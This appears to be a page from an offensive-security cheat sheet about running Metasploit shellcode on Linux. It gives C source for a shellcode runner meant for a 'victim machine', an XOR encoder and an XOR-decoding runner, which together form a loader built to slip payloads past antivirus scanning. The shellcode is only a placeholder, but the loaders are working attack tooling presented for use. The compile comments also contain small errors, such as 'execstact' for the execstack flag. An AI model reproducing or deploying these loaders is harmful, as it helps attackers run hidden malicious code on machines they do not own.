C Runner

Run metasploit shellcode

// compile with victim machine
// gcc -o shell.out shell.c -z execstact
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char buff[] =
"...."
"...shellcode..."
"....."

int main (int argc, char **argv)
{
    // run shellcode
    int (*apple)()=(int(*)())buff;
    apple();
}

Encoder C

Encoder XOR

// compile with kali machine
// gcc -o encoder.out encoder.c
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char buff[] =
"...."
"...shellcode..."
"....."
int main (int argc, char **argv)
{
    char xorKey = 'A';
    int payloadLength = (int) sizeof(buff);
    
    for (int i=0; i<payloadLength; i++)
    {
         printf("\\x%02X", buff[i]^xorKey);   
    }
    return 0;
}

Runner XOR in C:

// compile with victim machine
// gcc -o shell.out shell.c -z execstact
// run with : ./shell.out
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

unsigned char buff[] = 
"<encoded payload>"

int main (int argc, char **argv)
{
    // run shellcode decoded from xor
    char xorKey = 'A';
    int arraysize = (int) sizeof(buff);
    for (int i=0; i<arraysize-1; i++)
    {
        buff[i] = buff[i]^xorKey;
    }
    // run decoded payload
    int (*apple)()=(int(*)())buff;
    apple();
}

PreviousBypass AV LinuxNextExploit

Last updated